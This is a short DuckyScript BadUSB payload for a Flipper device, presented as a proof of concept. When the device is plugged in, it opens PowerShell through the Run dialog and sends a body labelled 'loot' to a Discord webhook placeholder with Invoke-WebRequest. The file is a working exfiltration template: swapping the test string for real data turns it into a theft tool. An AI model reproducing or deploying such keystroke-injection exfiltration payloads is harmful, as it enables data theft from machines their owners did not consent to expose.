REM Description: PoC fileless Flipper BadUSB exfil to discord webhook
REM Author: Vojnomir Malenkov
REM Based on https://github.com/atomiczsec/My-Payloads/blob/main/RubberDucky/payloads/Copy-And-Waste/c.ps1
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING [String]$contentbody = "this is a test of exfil data via webhook"
ENTER
DELAY 400
STRING $Body = @{ 
ENTER
DELAY 300
STRING 'username'= 'loot'
ENTER
DELAY 200
STRING 'content' = $contentbody }
ENTER
DELAY 500
STRING iwr -Uri DISCORD-WEBHOOK-HERE -Method POST -Body $Body
DELAY 500
ENTER
STRING exit
DELAY 200
ENTER
